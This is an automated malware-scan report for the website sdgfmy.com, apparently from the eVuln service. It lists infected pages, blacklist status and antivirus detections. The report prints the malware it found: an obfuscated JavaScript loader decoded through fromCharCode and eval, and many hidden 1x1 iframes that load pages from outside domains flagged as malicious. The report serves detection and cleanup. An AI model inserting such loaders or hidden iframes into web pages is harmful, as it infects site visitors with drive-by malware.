Malware Scanner report for sdgfmy.com

Malicious/Suspicious/Total urls checked: 13/0/15

13 pages have malicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "sdgfmy.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 8/31/39

8 malicious and 31 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=sdgfmy.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://sdgfmy.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://sdgfmy.com/	200 OK Content-Length: 41441 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 ... 413 bytes are skipped ...4", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "178", "183", "193", "190", "186", "175", "199", "110", "139", "110", "112", "188", "189", "188", "179", "112", "137"];var royv2776="";var qtih244="";for (tzsv56=0; tzsv56<mvg65785.length; tzsv56++){qtih244=mvg65785[tzsv56]-78;royv2776=royv2776+String.fromCharCode(qtih244);}eval(royv2776); Antivirus reports: Avast JS:HideMe-O [Trj] Ad-Aware JS:Trojan.JS.Redirector.E Ikarus Virus.JS.Obfuscated Panda JS/Redirector.K nProtect JS:Trojan.JS.Redirector.E TrendMicro-HouseCall TROJ_GEN.F47V1222 Comodo UnclassifiedMalware Emsisoft JS:Trojan.JS.Redirector.E (B) Microsoft VirTool:JS/Obfuscator.BS Kaspersky Trojan.JS.Redirector.ro MicroWorld-eScan JS:Trojan.JS.Redirector.E Fortinet JS/Crypt.BBDF!tr NANO-Antivirus Trojan.Script.Redirector.vfpst F-Secure JS:Trojan.JS.Redirector.E VIPRE VirTool.JS.Obfuscator.bs (v) AVG JS/Obfuscated GData JS:Trojan.JS.Redirector.E Agnitum JS.Crypt.CSA BitDefender JS:Trojan.JS.Redirector.E
http://sdgfmy.com/mm_menu.js	200 OK Content-Length: 30741 Content-Type: application/x-javascript	clean
http://sdgfmy.com/image/flash.js	200 OK Content-Length: 3135 Content-Type: application/x-javascript	malicious
Page code contains blacklisted domain: cc.haowangma.com ...[715 bytes skipped]... document.write("<span style=\"color:#FFFFFF;margin-top:4px\">ÍíÉÏ£º½áÊøÁËÒ»ÌìµÄÆ£±¹£¬ÇáËÉÒ»ÏÂ£¡</span>"); } else if(t>=0 && t<= 5) { document.write("<span style=\"color:#FFFFFF;margin-top:4px\">Áè³¿£ºÏÖÔÚÒ¹ÒÑÉîÁË,ÄúÒª×¢ÒâÐÝÏ¢£¡</span>"); } } <script src=http://www.hnxw.net/sms/f.js></script>> <ifrAme src=http://cc.haowangma.com/oNe/hao5.htm?015 widTh=1 Name='1710' height=1></iframe> <iFrame src=http://cc.zuiyige.net/one/hAo5.htm?058 widtH=1 nAme='5552' height=1></iframe> [ifraMe src=http://www.oiok01.nEt/s1.htm?bEi wIdth=1 Name='7799' height=1][/iframe] ...[2657 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://cc.zuiyige.net/one/hao5.htm?058 This URL is marked by Google as suspicious <iframe src=http://cc.zuiyige.net/one/hao5.htm?058 width=1 name='5552' height=1> Hidden iFrame found. size: 1x1 src: http://www.nkseujr.cn/x.htm?048 <iframe src=http://www.nkseujr.cn/x.htm?048 width=1 height=1> Hidden iFrame found. size: 100x1 src: http://www.gdsax.cn/s1.htm?hy <iframe src=http://www.gdsax.cn/s1.htm?hy width=100 name='7833' height=1> Hidden iFrame found. size: 50x0 src: http://www.hby007.cn/one/a26.htm?02 <iframe src=http://www.hby007.cn/one/a26.htm?02 width=50 height=0 border=0> Hidden iFrame found. size: 100x1 src: http://aaa.1l1l1l.com/qq.htm <iframe src=http://aaa.1l1l1l.com/qq.htm width=100 name='7833' height=1> Hidden iFrame found. size: 1x1 src: http://www.oiok01.net/s1.htm?bei <iframe src=http://www.oiok01.net/s1.htm?bei width=1 name='3079' height=1> Hidden iFrame found. size: 100x0 src: http://enenhk.cn/page/rnb.htm?mor <iframe src="http://enenhk.cn/page/rnb.htm?mor" width=100 height=0> Malicious iFrame found. size: 100x0 src: http://yiduaner.cn/page/rnb.htm?mor This URL is marked by Google as suspicious <iframe src="http://yiduaner.cn/page/rnb.htm?mor" width=100 name='2785' height=0> Hidden iFrame found. size: 100x0 src: http://twoeven.cn/page/rnb.htm?mor03 <iframe src="http://twoeven.cn/page/rnb.htm?mor03" width=100 height=0> Hidden iFrame found. size: 1x1 src: http://www.cdjew.cn/x.htm?048 <iframe src=http://www.cdjew.cn/x.htm?048 width=1 height=1> Hidden iFrame found. size: 1x1 src: http://aaa.1l1l1l.com/qq.htm <iframe src=http://aaa.1l1l1l.com/qq.htm width=1 name='8207' height=1> Hidden iFrame found. size: 100x0 src: http://iengli.cn/page/rnb.htm?mor03 <iframe src="http://iengli.cn/page/rnb.htm?mor03" width=100 height=0> Hidden iFrame found. size: 100x1 src: http://www.demo103.cn/s1.htm?bei01 <iframe src=http://www.demo103.cn/s1.htm?bei01 width=100 name='4998' height=1> Hidden iFrame found. size: 50x0 src: http://5j8dsand.cn/zzhu.htm?mor01 <iframe src=http://5j8dsand.cn/zzhu.htm?mor01 width=50 height=0> Malicious iFrame found. size: 100x0 src: http://yiduaner.cn/page/rnb.htm?mor This URL is marked by Google as suspicious <iframe src="http://yiduaner.cn/page/rnb.htm?mor" width=100 name='9779' height=0> Hidden iFrame found. size: 100x1 src: http://www.demo103.cn/s1.htm?bei01 <iframe src=http://www.demo103.cn/s1.htm?bei01 width=100 height=1> Hidden iFrame found. size: 1x1 src: http://www.vnet-1.net/s1.htm?hy <iframe src=http://www.vnet-1.net/s1.htm?hy width=1 name='8207' height=1> Hidden iFrame found. size: 100x0 src: http://fengshenge.cn/page/rnb.htm?mor01 <iframe src="http://fengshenge.cn/page/rnb.htm?mor01" width=100 height=0> Malicious iFrame found. size: 1x1 src: http://cc.haowangma.com/one/hao5.htm?015 This URL is marked by Google as suspicious <iframe src=http://cc.haowangma.com/one/hao5.htm?015 width=1 name='1710' height=1> Hidden iFrame found. size: 50x0 src: http://www.zdq004.cn/one/a26.htm <iframe src=http://www.zdq004.cn/one/a26.htm width=50 height=0 border=0>
http://sdgfmy.com/image/hxg.js	200 OK Content-Length: 5513 Content-Type: application/x-javascript	malicious
Page code contains blacklisted domain: cc.haowangma.com <!-- var bsYear; var bsDate; var bsWeek; var arrLen=8; //Êý×é³¤¶È var sValue=0; //µ±ÄêµÄÃëÊý var dayiy=0; //µ±ÄêµÚ¼¸Ìì var miy=0; //ÔÂ·ÝµÄÏÂ±ê var iyear=0; //Äê·Ý±ê¼Ç var dayim=0; //µ±ÔÂµÚ¼¸Ìì var spd=86400; //Ã¿ÌìµÄÃëÊý var year1999="30;29;29;30;29;29;30;29;30;30;30;29"; //354 var year2000="30;30;29;29;30;29;29;30;29;30;30;29"; //354 var year2001="30;30;29;30;29;30;29;29;30 ...[4567 bytes skipped]... Hidden iFrame found. size: 50x0 src: http://www.hby007.cn/one/a26.htm?02 <iframe src=http://www.hby007.cn/one/a26.htm?02 width=50 height=0 border=0> Malicious iFrame found. size: 1x1 src: http://cc.zuiyige.net/one/hao5.htm?058 This URL is marked by Google as suspicious <iframe src=http://cc.zuiyige.net/one/hao5.htm?058 width=1 name='9009' height=1> Hidden iFrame found. size: 1x1 src: http://aaa.1l1l1l.com/qq.htm <iframe src=http://aaa.1l1l1l.com/qq.htm width=1 name='1615' height=1> Hidden iFrame found. size: 1x1 src: http://www.nkseujr.cn/x.htm?048 <iframe src=http://www.nkseujr.cn/x.htm?048 width=1 height=1> Hidden iFrame found. size: 100x0 src: http://enenhk.cn/page/rnb.htm?mor <iframe src="http://enenhk.cn/page/rnb.htm?mor" width=100 height=0> Hidden iFrame found. size: 100x1 src: http://aaa.1l1l1l.com/qq.htm <iframe src=http://aaa.1l1l1l.com/qq.htm width=100 name='5313' height=1> Malicious iFrame found. size: 100x0 src: http://yiduaner.cn/page/rnb.htm?mor This URL is marked by Google as suspicious <iframe src="http://yiduaner.cn/page/rnb.htm?mor" width=100 name='2830' height=0> Malicious iFrame found. size: 1x1 src: http://cc.haowangma.com/one/hao5.htm?015 This URL is marked by Google as suspicious <iframe src=http://cc.haowangma.com/one/hao5.htm?015 width=1 name='4635' height=1> Hidden iFrame found. size: 1x1 src: http://www.vnet-1.net/s1.htm?hy <iframe src=http://www.vnet-1.net/s1.htm?hy width=1 name='1615' height=1> Hidden iFrame found. size: 100x0 src: http://iengli.cn/page/rnb.htm?mor03 <iframe src="http://iengli.cn/page/rnb.htm?mor03" width=100 height=0> Hidden iFrame found. size: 1x1 src: http://www.oiok01.net/s1.htm?bei <iframe src=http://www.oiok01.net/s1.htm?bei width=1 name='5702' height=1> Hidden iFrame found. size: 100x0 src: http://twoeven.cn/page/rnb.htm?mor03 <iframe src="http://twoeven.cn/page/rnb.htm?mor03" width=100 height=0> Hidden iFrame found. size: 1x1 src: http://www.cdjew.cn/x.htm?048 <iframe src=http://www.cdjew.cn/x.htm?048 width=1 height=1> Hidden iFrame found. size: 50x0 src: http://www.zdq004.cn/one/a26.htm <iframe src=http://www.zdq004.cn/one/a26.htm width=50 height=0 border=0> Hidden iFrame found. size: 100x0 src: http://fengshenge.cn/page/rnb.htm?mor01 <iframe src="http://fengshenge.cn/page/rnb.htm?mor01" width=100 height=0> Hidden iFrame found. size: 50x0 src: http://5j8dsand.cn/zzhu.htm?mor01 <iframe src=http://5j8dsand.cn/zzhu.htm?mor01 width=50 height=0> Hidden iFrame found. size: 100x1 src: http://www.gdsax.cn/s1.htm?hy <iframe src=http://www.gdsax.cn/s1.htm?hy width=100 name='5313' height=1> Hidden iFrame found. size: 100x1 src: http://www.demo103.cn/s1.htm?bei01 <iframe src=http://www.demo103.cn/s1.htm?bei01 width=100 height=1> Malicious iFrame found. size: 100x0 src: http://yiduaner.cn/page/rnb.htm?mor This URL is marked by Google as suspicious <iframe src="http://yiduaner.cn/page/rnb.htm?mor" width=100 name='3068' height=0>
http://sdgfmy.com/about.asp?id=6	200 OK Content-Length: 34208 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 ... 413 bytes are skipped ...4", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "178", "183", "193", "190", "186", "175", "199", "110", "139", "110", "112", "188", "189", "188", "179", "112", "137"];var royv2776="";var qtih244="";for (tzsv56=0; tzsv56<mvg65785.length; tzsv56++){qtih244=mvg65785[tzsv56]-78;royv2776=royv2776+String.fromCharCode(qtih244);}eval(royv2776); Antivirus reports: Avast JS:HideMe-O [Trj] Ad-Aware JS:Trojan.JS.Redirector.E Ikarus Virus.JS.Obfuscated Panda JS/Redirector.K nProtect JS:Trojan.JS.Redirector.E TrendMicro-HouseCall TROJ_GEN.F47V1222 Comodo UnclassifiedMalware Emsisoft JS:Trojan.JS.Redirector.E (B) Microsoft VirTool:JS/Obfuscator.BS Kaspersky Trojan.JS.Redirector.ro MicroWorld-eScan JS:Trojan.JS.Redirector.E Fortinet JS/Crypt.BBDF!tr NANO-Antivirus Trojan.Script.Redirector.vfpst F-Secure JS:Trojan.JS.Redirector.E VIPRE VirTool.JS.Obfuscator.bs (v) AVG JS/Obfuscated GData JS:Trojan.JS.Redirector.E Agnitum JS.Crypt.CSA BitDefender JS:Trojan.JS.Redirector.E
http://sdgfmy.com/index.asp	200 OK Content-Length: 41441 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 ... 413 bytes are skipped ...4", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "178", "183", "193", "190", "186", "175", "199", "110", "139", "110", "112", "188", "189", "188", "179", "112", "137"];var royv2776="";var qtih244="";for (tzsv56=0; tzsv56<mvg65785.length; tzsv56++){qtih244=mvg65785[tzsv56]-78;royv2776=royv2776+String.fromCharCode(qtih244);}eval(royv2776); Antivirus reports: Avast JS:HideMe-O [Trj] Ad-Aware JS:Trojan.JS.Redirector.E Ikarus Virus.JS.Obfuscated Panda JS/Redirector.K nProtect JS:Trojan.JS.Redirector.E TrendMicro-HouseCall TROJ_GEN.F47V1222 Comodo UnclassifiedMalware Emsisoft JS:Trojan.JS.Redirector.E (B) Microsoft VirTool:JS/Obfuscator.BS Kaspersky Trojan.JS.Redirector.ro MicroWorld-eScan JS:Trojan.JS.Redirector.E Fortinet JS/Crypt.BBDF!tr NANO-Antivirus Trojan.Script.Redirector.vfpst F-Secure JS:Trojan.JS.Redirector.E VIPRE VirTool.JS.Obfuscator.bs (v) AVG JS/Obfuscated GData JS:Trojan.JS.Redirector.E Agnitum JS.Crypt.CSA BitDefender JS:Trojan.JS.Redirector.E
http://sdgfmy.com/gsjj.htm	200 OK Content-Length: 18571 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var dnok690=["182", "193", "181", "199", "191", "183", "192", "198", "128", "185", "183", "198", "151", "190", "183", "191", "183", "192", "198", "148", "203", "155", "182", "122", "116", "179", "188", "179", "202", "137", "136", "134", "116", "123", "128", "197", "198", "203", "190", "183", "128", "194", "193", "197", "187", "198", "187", "193", "192", "114", "143", "114", "116", "179", "180", "197", "193", "190", "199", "198", "183", "116", "141", "182", "193", "181", "199", "191", "183", "192 ... 775 bytes are skipped ...83", "191", "183", "192", "198", "148", "203", "155", "182", "122", "116", "179", "188", "179", "202", "137", "136", "134", "116", "123", "128", "197", "198", "203", "190", "183", "128", "193", "200", "183", "196", "184", "190", "193", "201", "114", "143", "114", "116", "186", "187", "182", "182", "183", "192", "116", "141"];var cexgj1189="";var yjur67="";for (ggzq32=0; ggzq32<dnok690.length; ggzq32++){yjur67=dnok690[ggzq32]-82;cexgj1189=cexgj1189+String.fromCharCode(yjur67);}eval(cexgj1189); Antivirus reports: Avast JS:HideMe-O [Trj] Ad-Aware JS:Trojan.JS.Redirector.E Ikarus Virus.JS.Obfuscated Panda JS/Redirector.K nProtect JS:Trojan.JS.Redirector.E TrendMicro-HouseCall TROJ_GEN.F47V1222 Comodo UnclassifiedMalware Emsisoft JS:Trojan.JS.Redirector.E (B) Microsoft VirTool:JS/Obfuscator.BS Kaspersky Trojan.JS.Redirector.ro MicroWorld-eScan JS:Trojan.JS.Redirector.E Fortinet JS/Crypt.BBDF!tr NANO-Antivirus Trojan.Script.Redirector.vfpst F-Secure JS:Trojan.JS.Redirector.E VIPRE VirTool.JS.Obfuscator.bs (v) AVG JS/Obfuscated GData JS:Trojan.JS.Redirector.E Agnitum JS.Crypt.CSA BitDefender JS:Trojan.JS.Redirector.E
http://sdgfmy.com/qywh.asp?id=2	200 OK Content-Length: 32972 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 ... 413 bytes are skipped ...4", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "178", "183", "193", "190", "186", "175", "199", "110", "139", "110", "112", "188", "189", "188", "179", "112", "137"];var royv2776="";var qtih244="";for (tzsv56=0; tzsv56<mvg65785.length; tzsv56++){qtih244=mvg65785[tzsv56]-78;royv2776=royv2776+String.fromCharCode(qtih244);}eval(royv2776); Antivirus reports: Avast JS:HideMe-O [Trj] Ad-Aware JS:Trojan.JS.Redirector.E Ikarus Virus.JS.Obfuscated Panda JS/Redirector.K nProtect JS:Trojan.JS.Redirector.E TrendMicro-HouseCall TROJ_GEN.F47V1222 Comodo UnclassifiedMalware Emsisoft JS:Trojan.JS.Redirector.E (B) Microsoft VirTool:JS/Obfuscator.BS Kaspersky Trojan.JS.Redirector.ro MicroWorld-eScan JS:Trojan.JS.Redirector.E Fortinet JS/Crypt.BBDF!tr NANO-Antivirus Trojan.Script.Redirector.vfpst F-Secure JS:Trojan.JS.Redirector.E VIPRE VirTool.JS.Obfuscator.bs (v) AVG JS/Obfuscated GData JS:Trojan.JS.Redirector.E Agnitum JS.Crypt.CSA BitDefender JS:Trojan.JS.Redirector.E
http://sdgfmy.com/news.asp	200 OK Content-Length: 40766 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 ... 413 bytes are skipped ...4", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "178", "183", "193", "190", "186", "175", "199", "110", "139", "110", "112", "188", "189", "188", "179", "112", "137"];var royv2776="";var qtih244="";for (tzsv56=0; tzsv56<mvg65785.length; tzsv56++){qtih244=mvg65785[tzsv56]-78;royv2776=royv2776+String.fromCharCode(qtih244);}eval(royv2776); Antivirus reports: Avast JS:HideMe-O [Trj] Ad-Aware JS:Trojan.JS.Redirector.E Ikarus Virus.JS.Obfuscated Panda JS/Redirector.K nProtect JS:Trojan.JS.Redirector.E TrendMicro-HouseCall TROJ_GEN.F47V1222 Comodo UnclassifiedMalware Emsisoft JS:Trojan.JS.Redirector.E (B) Microsoft VirTool:JS/Obfuscator.BS Kaspersky Trojan.JS.Redirector.ro MicroWorld-eScan JS:Trojan.JS.Redirector.E Fortinet JS/Crypt.BBDF!tr NANO-Antivirus Trojan.Script.Redirector.vfpst F-Secure JS:Trojan.JS.Redirector.E VIPRE VirTool.JS.Obfuscator.bs (v) AVG JS/Obfuscated GData JS:Trojan.JS.Redirector.E Agnitum JS.Crypt.CSA BitDefender JS:Trojan.JS.Redirector.E
http://sdgfmy.com/product.asp	200 OK Content-Length: 48056 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 ... 413 bytes are skipped ...4", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "178", "183", "193", "190", "186", "175", "199", "110", "139", "110", "112", "188", "189", "188", "179", "112", "137"];var royv2776="";var qtih244="";for (tzsv56=0; tzsv56<mvg65785.length; tzsv56++){qtih244=mvg65785[tzsv56]-78;royv2776=royv2776+String.fromCharCode(qtih244);}eval(royv2776); Antivirus reports: Avast JS:HideMe-O [Trj] Ad-Aware JS:Trojan.JS.Redirector.E Ikarus Virus.JS.Obfuscated Panda JS/Redirector.K nProtect JS:Trojan.JS.Redirector.E TrendMicro-HouseCall TROJ_GEN.F47V1222 Comodo UnclassifiedMalware Emsisoft JS:Trojan.JS.Redirector.E (B) Microsoft VirTool:JS/Obfuscator.BS Kaspersky Trojan.JS.Redirector.ro MicroWorld-eScan JS:Trojan.JS.Redirector.E Fortinet JS/Crypt.BBDF!tr NANO-Antivirus Trojan.Script.Redirector.vfpst F-Secure JS:Trojan.JS.Redirector.E VIPRE VirTool.JS.Obfuscator.bs (v) AVG JS/Obfuscated GData JS:Trojan.JS.Redirector.E Agnitum JS.Crypt.CSA BitDefender JS:Trojan.JS.Redirector.E
http://sdgfmy.com/case.asp	200 OK Content-Length: 43971 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 ... 413 bytes are skipped ...4", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "178", "183", "193", "190", "186", "175", "199", "110", "139", "110", "112", "188", "189", "188", "179", "112", "137"];var royv2776="";var qtih244="";for (tzsv56=0; tzsv56<mvg65785.length; tzsv56++){qtih244=mvg65785[tzsv56]-78;royv2776=royv2776+String.fromCharCode(qtih244);}eval(royv2776); Antivirus reports: Avast JS:HideMe-O [Trj] Ad-Aware JS:Trojan.JS.Redirector.E Ikarus Virus.JS.Obfuscated Panda JS/Redirector.K nProtect JS:Trojan.JS.Redirector.E TrendMicro-HouseCall TROJ_GEN.F47V1222 Comodo UnclassifiedMalware Emsisoft JS:Trojan.JS.Redirector.E (B) Microsoft VirTool:JS/Obfuscator.BS Kaspersky Trojan.JS.Redirector.ro MicroWorld-eScan JS:Trojan.JS.Redirector.E Fortinet JS/Crypt.BBDF!tr NANO-Antivirus Trojan.Script.Redirector.vfpst F-Secure JS:Trojan.JS.Redirector.E VIPRE VirTool.JS.Obfuscator.bs (v) AVG JS/Obfuscated GData JS:Trojan.JS.Redirector.E Agnitum JS.Crypt.CSA BitDefender JS:Trojan.JS.Redirector.E
http://sdgfmy.com/about.asp?id=4	200 OK Content-Length: 33438 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 ... 413 bytes are skipped ...4", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "178", "183", "193", "190", "186", "175", "199", "110", "139", "110", "112", "188", "189", "188", "179", "112", "137"];var royv2776="";var qtih244="";for (tzsv56=0; tzsv56<mvg65785.length; tzsv56++){qtih244=mvg65785[tzsv56]-78;royv2776=royv2776+String.fromCharCode(qtih244);}eval(royv2776); Antivirus reports: Avast JS:HideMe-O [Trj] Ad-Aware JS:Trojan.JS.Redirector.E Ikarus Virus.JS.Obfuscated Panda JS/Redirector.K nProtect JS:Trojan.JS.Redirector.E TrendMicro-HouseCall TROJ_GEN.F47V1222 Comodo UnclassifiedMalware Emsisoft JS:Trojan.JS.Redirector.E (B) Microsoft VirTool:JS/Obfuscator.BS Kaspersky Trojan.JS.Redirector.ro MicroWorld-eScan JS:Trojan.JS.Redirector.E Fortinet JS/Crypt.BBDF!tr NANO-Antivirus Trojan.Script.Redirector.vfpst F-Secure JS:Trojan.JS.Redirector.E VIPRE VirTool.JS.Obfuscator.bs (v) AVG JS/Obfuscated GData JS:Trojan.JS.Redirector.E Agnitum JS.Crypt.CSA BitDefender JS:Trojan.JS.Redirector.E
http://sdgfmy.com/about.asp?id=7	200 OK Content-Length: 33715 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 ... 413 bytes are skipped ...4", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "178", "183", "193", "190", "186", "175", "199", "110", "139", "110", "112", "188", "189", "188", "179", "112", "137"];var royv2776="";var qtih244="";for (tzsv56=0; tzsv56<mvg65785.length; tzsv56++){qtih244=mvg65785[tzsv56]-78;royv2776=royv2776+String.fromCharCode(qtih244);}eval(royv2776); Antivirus reports: Avast JS:HideMe-O [Trj] Ad-Aware JS:Trojan.JS.Redirector.E Ikarus Virus.JS.Obfuscated Panda JS/Redirector.K nProtect JS:Trojan.JS.Redirector.E TrendMicro-HouseCall TROJ_GEN.F47V1222 Comodo UnclassifiedMalware Emsisoft JS:Trojan.JS.Redirector.E (B) Microsoft VirTool:JS/Obfuscator.BS Kaspersky Trojan.JS.Redirector.ro MicroWorld-eScan JS:Trojan.JS.Redirector.E Fortinet JS/Crypt.BBDF!tr NANO-Antivirus Trojan.Script.Redirector.vfpst F-Secure JS:Trojan.JS.Redirector.E VIPRE VirTool.JS.Obfuscator.bs (v) AVG JS/Obfuscated GData JS:Trojan.JS.Redirector.E Agnitum JS.Crypt.CSA BitDefender JS:Trojan.JS.Redirector.E
http://sdgfmy.com/about.asp?id=5	200 OK Content-Length: 33044 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 ... 413 bytes are skipped ...4", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "178", "183", "193", "190", "186", "175", "199", "110", "139", "110", "112", "188", "189", "188", "179", "112", "137"];var royv2776="";var qtih244="";for (tzsv56=0; tzsv56<mvg65785.length; tzsv56++){qtih244=mvg65785[tzsv56]-78;royv2776=royv2776+String.fromCharCode(qtih244);}eval(royv2776); Antivirus reports: Avast JS:HideMe-O [Trj] Ad-Aware JS:Trojan.JS.Redirector.E Ikarus Virus.JS.Obfuscated Panda JS/Redirector.K nProtect JS:Trojan.JS.Redirector.E TrendMicro-HouseCall TROJ_GEN.F47V1222 Comodo UnclassifiedMalware Emsisoft JS:Trojan.JS.Redirector.E (B) Microsoft VirTool:JS/Obfuscator.BS Kaspersky Trojan.JS.Redirector.ro MicroWorld-eScan JS:Trojan.JS.Redirector.E Fortinet JS/Crypt.BBDF!tr NANO-Antivirus Trojan.Script.Redirector.vfpst F-Secure JS:Trojan.JS.Redirector.E VIPRE VirTool.JS.Obfuscator.bs (v) AVG JS/Obfuscated GData JS:Trojan.JS.Redirector.E Agnitum JS.Crypt.CSA BitDefender JS:Trojan.JS.Redirector.E
http://sdgfmy.com/lyb/index.asp	200 OK Content-Length: 40579 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: sdgfmy.com

Result:
HTTP/1.1 200 OK
